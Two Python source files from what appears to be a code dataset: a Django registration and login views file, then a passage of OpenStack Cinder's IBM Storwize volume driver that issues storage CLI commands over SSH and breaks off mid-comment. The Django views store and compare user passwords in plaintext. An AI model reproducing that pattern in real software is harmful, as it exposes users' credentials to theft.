| no_license | totota/trade | 03c019f92df8846f47a1cee2a1c2b16fbcb5a50c | b690d51f05316d0b6f4cdcb01806ad79d3c1f4be | refs/heads/master | 2021-09-02T06:43:49.175307 | 2017-10-16T11:04:01 | 2017-10-16T11:04:01 | 108,209,337 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,379 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.http import HttpResponseRedirect,HttpResponse
from django.shortcuts import render
from .forms import registeruser,loginform
from dms.models import city,location,security,campus,user,commodity,collection,indent,delegation,delegation_order
def adduser(request):
if request.method=='POST':
form=registeruser(request.POST)
print form
print 'post'
if form.is_valid():
print type(user.objects.filter(username=form.cleaned_data['username']))
            if form.cleaned_data['password'] == form.cleaned_data['ageinpassword']:
                print 'password is right'
            else:
                information='the two passwords do not match'
                return HttpResponse(information)
if user.objects.filter(username=form.cleaned_data['username']):
#print "yonghuchongfu"
                information='Username already exists'
return render(request,'usermas/regins.html',{'information':information})
if campus.objects.filter(name='default'):
default=campus.objects.get(name='default')
#print 'have default'
else:
default=campus(name='default')
default.save()
#print 'no default'
if location.objects.filter(extra='default'):
defaultlocation=location.objects.get(extra='default')
#print 'have default'
else:
defaultcity=city(province='default',country='default',cityname='default')
defaultcity.save()
defaultlocation=location(extra='default',cityid=defaultcity)
defaultlocation.save()
#print 'no default'
uniquequery=request.POST.get('unique','null')
mysecurity=security(password=form.cleaned_data['password'],tel=form.cleaned_data['phone'],email=form.cleaned_data['email'])
mysecurity.save()
myuser=user(username=form.cleaned_data['username'],age=0,unique=uniquequery,security_id=mysecurity,campus_id=default,addressid=defaultlocation,locationid=defaultlocation)
myuser.save()
information='save ok'
return HttpResponse(information)
else:
            return HttpResponse('error')
else:
return render(request,'usermas/regins.html')
#return HttpResponse('error')
def login(request):
if request.method=='POST':
form=loginform(request.POST)
if form.is_valid():
print 'rrr'
myuser=user.objects.filter(username__exact=form.cleaned_data['username'],security_id__password__exact=form.cleaned_data['password'])
if myuser:
                information='welcome '+form.cleaned_data['username']
return HttpResponse(information)
else:
information='password or username error'
return render(request,'usermas/login.html',{'information':information})
else:
            print 'form is invalid'
            information='invalid form data'
return render(request,'usermas/login.html',{'information':information})
else:
return render(request,'usermas/login.html')
# Create your views here.
| [
"[email protected]"
]
| |
75e67f9d2f99485e02e71e9d13c80edfe59d577a | 42c63d5f9c724c99ba93f77bdead51891fcf8623 | /OpenStack-Mitaka-src/cinder/cinder/volume/drivers/ibm/storwize_svc/storwize_svc_common.py | f5e43d96d19eda583d719b33f56058a3e20c740f | [
"Apache-2.0"
]
| permissive | liyongle/openstack-mitaka | 115ae819d42ed9bf0922a8c0ab584fa99a3daf92 | 5ccd31c6c3b9aa68b9db1bdafcf1b029e8e37b33 | refs/heads/master | 2021-07-13T04:57:53.488114 | 2019-03-07T13:26:25 | 2019-03-07T13:26:25 | 174,311,782 | 0 | 1 | null | 2020-07-24T01:44:47 | 2019-03-07T09:18:55 | Python | UTF-8 | Python | false | false | 139,105 | py | # Copyright 2015 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import math
import paramiko
import random
import re
import string
import time
import unicodedata
from eventlet import greenthread
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils
from oslo_utils import strutils
from oslo_utils import units
import six
from cinder import context
from cinder import exception
from cinder import ssh_utils
from cinder import utils as cinder_utils
from cinder.i18n import _, _LE, _LI, _LW
from cinder.objects import fields
from cinder.volume import driver
from cinder.volume.drivers.ibm.storwize_svc import (
replication as storwize_rep)
from cinder.volume.drivers.san import san
from cinder.volume import qos_specs
from cinder.volume import utils
from cinder.volume import volume_types
INTERVAL_1_SEC = 1
DEFAULT_TIMEOUT = 15
LOG = logging.getLogger(__name__)
storwize_svc_opts = [
cfg.ListOpt('storwize_svc_volpool_name',
default=['volpool'],
help='Comma separated list of storage system storage '
'pools for volumes.'),
cfg.IntOpt('storwize_svc_vol_rsize',
default=2,
min=-1, max=100,
help='Storage system space-efficiency parameter for volumes '
'(percentage)'),
cfg.IntOpt('storwize_svc_vol_warning',
default=0,
min=-1, max=100,
help='Storage system threshold for volume capacity warnings '
'(percentage)'),
cfg.BoolOpt('storwize_svc_vol_autoexpand',
default=True,
help='Storage system autoexpand parameter for volumes '
'(True/False)'),
cfg.IntOpt('storwize_svc_vol_grainsize',
default=256,
help='Storage system grain size parameter for volumes '
'(32/64/128/256)'),
cfg.BoolOpt('storwize_svc_vol_compression',
default=False,
help='Storage system compression option for volumes'),
cfg.BoolOpt('storwize_svc_vol_easytier',
default=True,
help='Enable Easy Tier for volumes'),
cfg.IntOpt('storwize_svc_vol_iogrp',
default=0,
help='The I/O group in which to allocate volumes'),
cfg.IntOpt('storwize_svc_flashcopy_timeout',
default=120,
min=1, max=600,
help='Maximum number of seconds to wait for FlashCopy to be '
'prepared.'),
cfg.BoolOpt('storwize_svc_multihostmap_enabled',
default=True,
                help='This option no longer has any effect. It is deprecated '
'and will be removed in the next release.',
deprecated_for_removal=True),
cfg.BoolOpt('storwize_svc_allow_tenant_qos',
default=False,
help='Allow tenants to specify QOS on create'),
cfg.StrOpt('storwize_svc_stretched_cluster_partner',
default=None,
help='If operating in stretched cluster mode, specify the '
'name of the pool in which mirrored copies are stored.'
'Example: "pool2"'),
cfg.StrOpt('storwize_san_secondary_ip',
default=None,
help='Specifies secondary management IP or hostname to be '
'used if san_ip is invalid or becomes inaccessible.'),
cfg.BoolOpt('storwize_svc_vol_nofmtdisk',
default=False,
help='Specifies that the volume not be formatted during '
'creation.'),
cfg.IntOpt('storwize_svc_flashcopy_rate',
default=50,
min=1, max=100,
help='Specifies the Storwize FlashCopy copy rate to be used '
'when creating a full volume copy. The default is rate '
'is 50, and the valid rates are 1-100.'),
]
CONF = cfg.CONF
CONF.register_opts(storwize_svc_opts)
class StorwizeSSH(object):
"""SSH interface to IBM Storwize family and SVC storage systems."""
def __init__(self, run_ssh):
self._ssh = run_ssh
def _run_ssh(self, ssh_cmd):
try:
return self._ssh(ssh_cmd)
except processutils.ProcessExecutionError as e:
msg = (_('CLI Exception output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': e.stdout,
'err': e.stderr})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def run_ssh_info(self, ssh_cmd, delim='!', with_header=False):
"""Run an SSH command and return parsed output."""
raw = self._run_ssh(ssh_cmd)
return CLIResponse(raw, ssh_cmd=ssh_cmd, delim=delim,
with_header=with_header)
def run_ssh_assert_no_output(self, ssh_cmd):
"""Run an SSH command and assert no output returned."""
out, err = self._run_ssh(ssh_cmd)
if len(out.strip()) != 0:
msg = (_('Expected no output from CLI command %(cmd)s, '
'got %(out)s.') % {'cmd': ' '.join(ssh_cmd), 'out': out})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def run_ssh_check_created(self, ssh_cmd):
"""Run an SSH command and return the ID of the created object."""
out, err = self._run_ssh(ssh_cmd)
try:
match_obj = re.search(r'\[([0-9]+)\],? successfully created', out)
return match_obj.group(1)
except (AttributeError, IndexError):
msg = (_('Failed to parse CLI output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': out,
'err': err})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
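    # Illustrative example (CLI output format assumed): given output such as
    # 'Virtual Disk, id [5], successfully created', the regex above captures
    # '5' and the method returns it as the new object's ID.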
def lsnode(self, node_id=None):
with_header = True
ssh_cmd = ['svcinfo', 'lsnode', '-delim', '!']
if node_id:
with_header = False
ssh_cmd.append(node_id)
return self.run_ssh_info(ssh_cmd, with_header=with_header)
def lslicense(self):
ssh_cmd = ['svcinfo', 'lslicense', '-delim', '!']
return self.run_ssh_info(ssh_cmd)[0]
def lsguicapabilities(self):
ssh_cmd = ['svcinfo', 'lsguicapabilities', '-delim', '!']
return self.run_ssh_info(ssh_cmd)[0]
def lssystem(self):
ssh_cmd = ['svcinfo', 'lssystem', '-delim', '!']
return self.run_ssh_info(ssh_cmd)[0]
def lsmdiskgrp(self, pool):
ssh_cmd = ['svcinfo', 'lsmdiskgrp', '-bytes', '-delim', '!',
'"%s"' % pool]
return self.run_ssh_info(ssh_cmd)[0]
def lsiogrp(self):
ssh_cmd = ['svcinfo', 'lsiogrp', '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lsportip(self):
ssh_cmd = ['svcinfo', 'lsportip', '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
@staticmethod
def _create_port_arg(port_type, port_name):
if port_type == 'initiator':
port = ['-iscsiname']
else:
port = ['-hbawwpn']
port.append(port_name)
return port
def mkhost(self, host_name, port_type, port_name):
port = self._create_port_arg(port_type, port_name)
ssh_cmd = ['svctask', 'mkhost', '-force'] + port
ssh_cmd += ['-name', '"%s"' % host_name]
return self.run_ssh_check_created(ssh_cmd)
def addhostport(self, host, port_type, port_name):
port = self._create_port_arg(port_type, port_name)
ssh_cmd = ['svctask', 'addhostport', '-force'] + port + ['"%s"' % host]
self.run_ssh_assert_no_output(ssh_cmd)
def lshost(self, host=None):
with_header = True
ssh_cmd = ['svcinfo', 'lshost', '-delim', '!']
if host:
with_header = False
ssh_cmd.append('"%s"' % host)
return self.run_ssh_info(ssh_cmd, with_header=with_header)
def add_chap_secret(self, secret, host):
ssh_cmd = ['svctask', 'chhost', '-chapsecret', secret, '"%s"' % host]
self.run_ssh_assert_no_output(ssh_cmd)
def lsiscsiauth(self):
ssh_cmd = ['svcinfo', 'lsiscsiauth', '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lsfabric(self, wwpn=None, host=None):
ssh_cmd = ['svcinfo', 'lsfabric', '-delim', '!']
if wwpn:
ssh_cmd.extend(['-wwpn', wwpn])
elif host:
ssh_cmd.extend(['-host', '"%s"' % host])
else:
msg = (_('Must pass wwpn or host to lsfabric.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
return self.run_ssh_info(ssh_cmd, with_header=True)
def mkvdiskhostmap(self, host, vdisk, lun, multihostmap):
"""Map vdisk to host.
If vdisk already mapped and multihostmap is True, use the force flag.
"""
ssh_cmd = ['svctask', 'mkvdiskhostmap', '-host', '"%s"' % host,
'-scsi', lun, vdisk]
if multihostmap:
ssh_cmd.insert(ssh_cmd.index('mkvdiskhostmap') + 1, '-force')
try:
self.run_ssh_check_created(ssh_cmd)
except Exception as ex:
if (not multihostmap and hasattr(ex, 'message') and
'CMMVC6071E' in ex.message):
LOG.error(_LE('storwize_svc_multihostmap_enabled is set '
'to False, not allowing multi host mapping.'))
raise exception.VolumeDriverException(
                    message=_('CMMVC6071E The VDisk-to-host mapping was not '
                              'created because the VDisk is already mapped '
                              'to a host.'))
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error mapping VDisk-to-host'))
def mkrcrelationship(self, master, aux, system, name, asyncmirror):
ssh_cmd = ['svctask', 'mkrcrelationship', '-master', master,
'-aux', aux, '-cluster', system, '-name', name]
if asyncmirror:
ssh_cmd.append('-global')
return self.run_ssh_check_created(ssh_cmd)
def rmrcrelationship(self, relationship):
ssh_cmd = ['svctask', 'rmrcrelationship', relationship]
self.run_ssh_assert_no_output(ssh_cmd)
def switchrelationship(self, relationship, aux=True):
primary = 'aux' if aux else 'master'
ssh_cmd = ['svctask', 'switchrcrelationship', '-primary',
primary, relationship]
self.run_ssh_assert_no_output(ssh_cmd)
def startrcrelationship(self, rc_rel, primary=None):
ssh_cmd = ['svctask', 'startrcrelationship', '-force']
if primary:
ssh_cmd.extend(['-primary', primary])
ssh_cmd.append(rc_rel)
self.run_ssh_assert_no_output(ssh_cmd)
def stoprcrelationship(self, relationship, access=False):
ssh_cmd = ['svctask', 'stoprcrelationship']
if access:
ssh_cmd.append('-access')
ssh_cmd.append(relationship)
self.run_ssh_assert_no_output(ssh_cmd)
def lsrcrelationship(self, volume_name):
key_value = 'name=%s' % volume_name
ssh_cmd = ['svcinfo', 'lsrcrelationship', '-filtervalue',
key_value, '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lspartnership(self, system_name):
key_value = 'name=%s' % system_name
ssh_cmd = ['svcinfo', 'lspartnership', '-filtervalue',
key_value, '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lspartnershipcandidate(self):
ssh_cmd = ['svcinfo', 'lspartnershipcandidate', '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def mkippartnership(self, ip_v4, bandwith):
ssh_cmd = ['svctask', 'mkippartnership', '-type', 'ipv4',
'-clusterip', ip_v4, '-linkbandwidthmbits',
six.text_type(bandwith)]
return self.run_ssh_assert_no_output(ssh_cmd)
def mkfcpartnership(self, system_name, bandwith):
ssh_cmd = ['svctask', 'mkfcpartnership', '-linkbandwidthmbits',
six.text_type(bandwith), system_name]
return self.run_ssh_assert_no_output(ssh_cmd)
def startpartnership(self, partnership_id):
ssh_cmd = ['svctask', 'chpartnership', '-start', partnership_id]
return self.run_ssh_assert_no_output(ssh_cmd)
def rmvdiskhostmap(self, host, vdisk):
ssh_cmd = ['svctask', 'rmvdiskhostmap', '-host', '"%s"' % host, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def lsvdiskhostmap(self, vdisk):
ssh_cmd = ['svcinfo', 'lsvdiskhostmap', '-delim', '!', vdisk]
return self.run_ssh_info(ssh_cmd, with_header=True)
def lshostvdiskmap(self, host):
ssh_cmd = ['svcinfo', 'lshostvdiskmap', '-delim', '!', '"%s"' % host]
return self.run_ssh_info(ssh_cmd, with_header=True)
def rmhost(self, host):
ssh_cmd = ['svctask', 'rmhost', '"%s"' % host]
self.run_ssh_assert_no_output(ssh_cmd)
def mkvdisk(self, name, size, units, pool, opts, params):
ssh_cmd = ['svctask', 'mkvdisk', '-name', name, '-mdiskgrp',
'"%s"' % pool, '-iogrp', six.text_type(opts['iogrp']),
'-size', size, '-unit', units] + params
return self.run_ssh_check_created(ssh_cmd)
def rmvdisk(self, vdisk, force=True):
ssh_cmd = ['svctask', 'rmvdisk']
if force:
ssh_cmd += ['-force']
ssh_cmd += [vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def lsvdisk(self, vdisk):
"""Return vdisk attributes or None if it doesn't exist."""
ssh_cmd = ['svcinfo', 'lsvdisk', '-bytes', '-delim', '!', vdisk]
out, err = self._ssh(ssh_cmd, check_exit_code=False)
if not len(err):
return CLIResponse((out, err), ssh_cmd=ssh_cmd, delim='!',
with_header=False)[0]
if err.startswith('CMMVC5754E'):
return None
msg = (_('CLI Exception output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': out,
'err': err})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def lsvdisks_from_filter(self, filter_name, value):
"""Performs an lsvdisk command, filtering the results as specified.
Returns an iterable for all matching vdisks.
"""
ssh_cmd = ['svcinfo', 'lsvdisk', '-bytes', '-delim', '!',
'-filtervalue', '%s=%s' % (filter_name, value)]
return self.run_ssh_info(ssh_cmd, with_header=True)
def chvdisk(self, vdisk, params):
ssh_cmd = ['svctask', 'chvdisk'] + params + [vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def movevdisk(self, vdisk, iogrp):
ssh_cmd = ['svctask', 'movevdisk', '-iogrp', iogrp, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def expandvdisksize(self, vdisk, amount):
ssh_cmd = (
['svctask', 'expandvdisksize', '-size', six.text_type(amount),
'-unit', 'gb', vdisk])
self.run_ssh_assert_no_output(ssh_cmd)
def mkfcmap(self, source, target, full_copy, copy_rate, consistgrp=None):
ssh_cmd = ['svctask', 'mkfcmap', '-source', source, '-target',
target, '-autodelete']
if not full_copy:
ssh_cmd.extend(['-copyrate', '0'])
else:
ssh_cmd.extend(['-copyrate', six.text_type(copy_rate)])
if consistgrp:
ssh_cmd.extend(['-consistgrp', consistgrp])
out, err = self._ssh(ssh_cmd, check_exit_code=False)
if 'successfully created' not in out:
msg = (_('CLI Exception output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': out,
'err': err})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
try:
match_obj = re.search(r'FlashCopy Mapping, id \[([0-9]+)\], '
'successfully created', out)
fc_map_id = match_obj.group(1)
except (AttributeError, IndexError):
msg = (_('Failed to parse CLI output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': out,
'err': err})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return fc_map_id
def prestartfcmap(self, fc_map_id):
ssh_cmd = ['svctask', 'prestartfcmap', fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def startfcmap(self, fc_map_id):
ssh_cmd = ['svctask', 'startfcmap', fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def prestartfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'prestartfcconsistgrp', fc_consist_group]
self.run_ssh_assert_no_output(ssh_cmd)
def startfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'startfcconsistgrp', fc_consist_group]
self.run_ssh_assert_no_output(ssh_cmd)
def stopfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'stopfcconsistgrp', fc_consist_group]
self.run_ssh_assert_no_output(ssh_cmd)
def chfcmap(self, fc_map_id, copyrate='50', autodel='on'):
ssh_cmd = ['svctask', 'chfcmap', '-copyrate', copyrate,
'-autodelete', autodel, fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def stopfcmap(self, fc_map_id):
ssh_cmd = ['svctask', 'stopfcmap', fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def rmfcmap(self, fc_map_id):
ssh_cmd = ['svctask', 'rmfcmap', '-force', fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def lsvdiskfcmappings(self, vdisk):
ssh_cmd = ['svcinfo', 'lsvdiskfcmappings', '-delim', '!', vdisk]
return self.run_ssh_info(ssh_cmd, with_header=True)
def lsfcmap(self, fc_map_id):
ssh_cmd = ['svcinfo', 'lsfcmap', '-filtervalue',
'id=%s' % fc_map_id, '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lsfcconsistgrp(self, fc_consistgrp):
ssh_cmd = ['svcinfo', 'lsfcconsistgrp', '-delim', '!', fc_consistgrp]
out, err = self._ssh(ssh_cmd)
return CLIResponse((out, err), ssh_cmd=ssh_cmd, delim='!',
with_header=False)
def mkfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'mkfcconsistgrp', '-name', fc_consist_group]
return self.run_ssh_check_created(ssh_cmd)
def rmfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'rmfcconsistgrp', '-force', fc_consist_group]
return self.run_ssh_assert_no_output(ssh_cmd)
def addvdiskcopy(self, vdisk, dest_pool, params):
ssh_cmd = (['svctask', 'addvdiskcopy'] + params + ['-mdiskgrp',
'"%s"' % dest_pool, vdisk])
return self.run_ssh_check_created(ssh_cmd)
def lsvdiskcopy(self, vdisk, copy_id=None):
ssh_cmd = ['svcinfo', 'lsvdiskcopy', '-delim', '!']
with_header = True
if copy_id:
ssh_cmd += ['-copy', copy_id]
with_header = False
ssh_cmd += [vdisk]
return self.run_ssh_info(ssh_cmd, with_header=with_header)
def lsvdisksyncprogress(self, vdisk, copy_id):
ssh_cmd = ['svcinfo', 'lsvdisksyncprogress', '-delim', '!',
'-copy', copy_id, vdisk]
return self.run_ssh_info(ssh_cmd, with_header=True)[0]
def rmvdiskcopy(self, vdisk, copy_id):
ssh_cmd = ['svctask', 'rmvdiskcopy', '-copy', copy_id, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def addvdiskaccess(self, vdisk, iogrp):
ssh_cmd = ['svctask', 'addvdiskaccess', '-iogrp', iogrp, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def rmvdiskaccess(self, vdisk, iogrp):
ssh_cmd = ['svctask', 'rmvdiskaccess', '-iogrp', iogrp, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def lsportfc(self, node_id):
ssh_cmd = ['svcinfo', 'lsportfc', '-delim', '!',
'-filtervalue', 'node_id=%s' % node_id]
return self.run_ssh_info(ssh_cmd, with_header=True)
class StorwizeHelpers(object):
    # All the supported QoS keys are saved in this dict. When a new
    # key is added, three values MUST be set:
# 'default': to indicate the value, when the parameter is disabled.
# 'param': to indicate the corresponding parameter in the command.
# 'type': to indicate the type of this value.
svc_qos_keys = {'IOThrottling': {'default': '0',
'param': 'rate',
'type': int}}
def __init__(self, run_ssh):
self.ssh = StorwizeSSH(run_ssh)
self.check_fcmapping_interval = 3
@staticmethod
def handle_keyerror(cmd, out):
msg = (_('Could not find key in output of command %(cmd)s: %(out)s.')
% {'out': out, 'cmd': cmd})
raise exception.VolumeBackendAPIException(data=msg)
def compression_enabled(self):
"""Return whether or not compression is enabled for this system."""
resp = self.ssh.lslicense()
keys = ['license_compression_enclosures',
'license_compression_capacity']
for key in keys:
if resp.get(key, '0') != '0':
return True
# lslicense is not used for V9000 compression check
# compression_enclosures and compression_capacity are
# always 0. V9000 uses license_scheme 9846 as an
# indicator and can always do compression
try:
resp = self.ssh.lsguicapabilities()
if resp.get('license_scheme', '0') == '9846':
return True
except exception.VolumeBackendAPIException as war:
LOG.warning(_LW("Failed to run lsguicapability. "
"Exception: %s."), war)
return False
def get_system_info(self):
"""Return system's name, ID, and code level."""
resp = self.ssh.lssystem()
level = resp['code_level']
match_obj = re.search('([0-9].){3}[0-9]', level)
if match_obj is None:
msg = _('Failed to get code level (%s).') % level
raise exception.VolumeBackendAPIException(data=msg)
code_level = match_obj.group().split('.')
return {'code_level': tuple([int(x) for x in code_level]),
'system_name': resp['name'],
'system_id': resp['id']}
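    # Illustrative example (code_level format assumed): a reported
    # code_level of '7.6.1.0 (build 125.6.1606091354000)' is parsed by the
    # regex above into code_level == (7, 6, 1, 0).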
def get_pool_attrs(self, pool):
"""Return attributes for the specified pool."""
return self.ssh.lsmdiskgrp(pool)
def get_available_io_groups(self):
"""Return list of available IO groups."""
iogrps = []
resp = self.ssh.lsiogrp()
for iogrp in resp:
try:
if int(iogrp['node_count']) > 0:
iogrps.append(int(iogrp['id']))
except KeyError:
self.handle_keyerror('lsiogrp', iogrp)
except ValueError:
msg = (_('Expected integer for node_count, '
'svcinfo lsiogrp returned: %(node)s.') %
{'node': iogrp['node_count']})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return iogrps
def get_volume_io_group(self, vol_name):
vdisk = self.ssh.lsvdisk(vol_name)
if vdisk:
resp = self.ssh.lsiogrp()
for iogrp in resp:
if iogrp['name'] == vdisk['IO_group_name']:
return int(iogrp['id'])
return None
def get_node_info(self):
"""Return dictionary containing information on system's nodes."""
nodes = {}
resp = self.ssh.lsnode()
for node_data in resp:
try:
if node_data['status'] != 'online':
continue
node = {}
node['id'] = node_data['id']
node['name'] = node_data['name']
node['IO_group'] = node_data['IO_group_id']
node['iscsi_name'] = node_data['iscsi_name']
node['WWNN'] = node_data['WWNN']
node['status'] = node_data['status']
node['WWPN'] = []
node['ipv4'] = []
node['ipv6'] = []
node['enabled_protocols'] = []
nodes[node['id']] = node
except KeyError:
self.handle_keyerror('lsnode', node_data)
return nodes
def add_iscsi_ip_addrs(self, storage_nodes):
"""Add iSCSI IP addresses to system node information."""
resp = self.ssh.lsportip()
for ip_data in resp:
try:
state = ip_data['state']
if ip_data['node_id'] in storage_nodes and (
state == 'configured' or state == 'online'):
node = storage_nodes[ip_data['node_id']]
if len(ip_data['IP_address']):
node['ipv4'].append(ip_data['IP_address'])
if len(ip_data['IP_address_6']):
node['ipv6'].append(ip_data['IP_address_6'])
except KeyError:
self.handle_keyerror('lsportip', ip_data)
def add_fc_wwpns(self, storage_nodes):
"""Add FC WWPNs to system node information."""
for key in storage_nodes:
node = storage_nodes[key]
wwpns = set(node['WWPN'])
resp = self.ssh.lsportfc(node_id=node['id'])
for port_info in resp:
if (port_info['type'] == 'fc' and
port_info['status'] == 'active'):
wwpns.add(port_info['WWPN'])
node['WWPN'] = list(wwpns)
LOG.info(_LI('WWPN on node %(node)s: %(wwpn)s.'),
{'node': node['id'], 'wwpn': node['WWPN']})
def add_chap_secret_to_host(self, host_name):
"""Generate and store a randomly-generated CHAP secret for the host."""
chap_secret = utils.generate_password()
self.ssh.add_chap_secret(chap_secret, host_name)
return chap_secret
def get_chap_secret_for_host(self, host_name):
"""Generate and store a randomly-generated CHAP secret for the host."""
resp = self.ssh.lsiscsiauth()
host_found = False
for host_data in resp:
try:
if host_data['name'] == host_name:
host_found = True
if host_data['iscsi_auth_method'] == 'chap':
return host_data['iscsi_chap_secret']
except KeyError:
self.handle_keyerror('lsiscsiauth', host_data)
if not host_found:
msg = _('Failed to find host %s.') % host_name
raise exception.VolumeBackendAPIException(data=msg)
return None
def get_conn_fc_wwpns(self, host):
wwpns = set()
resp = self.ssh.lsfabric(host=host)
for wwpn in resp.select('local_wwpn'):
if wwpn is not None:
wwpns.add(wwpn)
return list(wwpns)
def get_host_from_connector(self, connector):
"""Return the Storwize host described by the connector."""
LOG.debug('Enter: get_host_from_connector: %s.', connector)
# If we have FC information, we have a faster lookup option
host_name = None
if 'wwpns' in connector:
for wwpn in connector['wwpns']:
resp = self.ssh.lsfabric(wwpn=wwpn)
for wwpn_info in resp:
try:
if (wwpn_info['remote_wwpn'] and
wwpn_info['name'] and
wwpn_info['remote_wwpn'].lower() ==
wwpn.lower()):
host_name = wwpn_info['name']
except KeyError:
self.handle_keyerror('lsfabric', wwpn_info)
if host_name:
LOG.debug('Leave: get_host_from_connector: host %s.', host_name)
return host_name
# That didn't work, so try exhaustive search
hosts_info = self.ssh.lshost()
found = False
for name in hosts_info.select('name'):
resp = self.ssh.lshost(host=name)
if 'initiator' in connector:
for iscsi in resp.select('iscsi_name'):
if iscsi == connector['initiator']:
host_name = name
found = True
break
elif 'wwpns' in connector and len(connector['wwpns']):
connector_wwpns = [str(x).lower() for x in connector['wwpns']]
for wwpn in resp.select('WWPN'):
if wwpn and wwpn.lower() in connector_wwpns:
host_name = name
found = True
break
if found:
break
LOG.debug('Leave: get_host_from_connector: host %s.', host_name)
return host_name
def create_host(self, connector):
"""Create a new host on the storage system.
We create a host name and associate it with the given connection
information. The host name will be a cleaned up version of the given
host name (at most 55 characters), plus a random 8-character suffix to
avoid collisions. The total length should be at most 63 characters.
"""
LOG.debug('Enter: create_host: host %s.', connector['host'])
# Before we start, make sure host name is a string and that we have at
# least one port.
host_name = connector['host']
if not isinstance(host_name, six.string_types):
msg = _('create_host: Host name is not unicode or string.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
ports = []
if 'initiator' in connector:
ports.append(['initiator', '%s' % connector['initiator']])
if 'wwpns' in connector:
for wwpn in connector['wwpns']:
ports.append(['wwpn', '%s' % wwpn])
if not len(ports):
msg = _('create_host: No initiators or wwpns supplied.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
# Build a host name for the Storwize host - first clean up the name
if isinstance(host_name, six.text_type):
host_name = unicodedata.normalize('NFKD', host_name).encode(
'ascii', 'replace').decode('ascii')
for num in range(0, 128):
ch = str(chr(num))
if not ch.isalnum() and ch not in [' ', '.', '-', '_']:
host_name = host_name.replace(ch, '-')
        # Storwize doesn't like a host name that doesn't start with a letter or _.
if not re.match('^[A-Za-z]', host_name):
host_name = '_' + host_name
# Add a random 8-character suffix to avoid collisions
rand_id = str(random.randint(0, 99999999)).zfill(8)
host_name = '%s-%s' % (host_name[:55], rand_id)
# Create a host with one port
port = ports.pop(0)
self.ssh.mkhost(host_name, port[0], port[1])
# Add any additional ports to the host
for port in ports:
self.ssh.addhostport(host_name, port[0], port[1])
LOG.debug('Leave: create_host: host %(host)s - %(host_name)s.',
{'host': connector['host'], 'host_name': host_name})
return host_name
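    # Illustrative example (connector value assumed): a connector host of
    # 'node*1' becomes 'node-1' after the character cleanup above, and is
    # returned as something like 'node-1-00042317' once the random 8-digit
    # suffix is appended.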
def delete_host(self, host_name):
self.ssh.rmhost(host_name)
def map_vol_to_host(self, volume_name, host_name, multihostmap):
"""Create a mapping between a volume to a host."""
LOG.debug('Enter: map_vol_to_host: volume %(volume_name)s to '
'host %(host_name)s.',
{'volume_name': volume_name, 'host_name': host_name})
# Check if this volume is already mapped to this host
mapped = False
luns_used = []
result_lun = '-1'
resp = self.ssh.lshostvdiskmap(host_name)
for mapping_info in resp:
luns_used.append(int(mapping_info['SCSI_id']))
if mapping_info['vdisk_name'] == volume_name:
mapped = True
result_lun = mapping_info['SCSI_id']
if not mapped:
# Find unused lun
luns_used.sort()
result_lun = str(len(luns_used))
for index, n in enumerate(luns_used):
if n > index:
result_lun = str(index)
break
self.ssh.mkvdiskhostmap(host_name, volume_name, result_lun,
multihostmap)
LOG.debug('Leave: map_vol_to_host: LUN %(result_lun)s, volume '
'%(volume_name)s, host %(host_name)s.',
{'result_lun': result_lun,
'volume_name': volume_name,
'host_name': host_name})
return int(result_lun)
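    # Illustrative example (existing mappings assumed): if the host already
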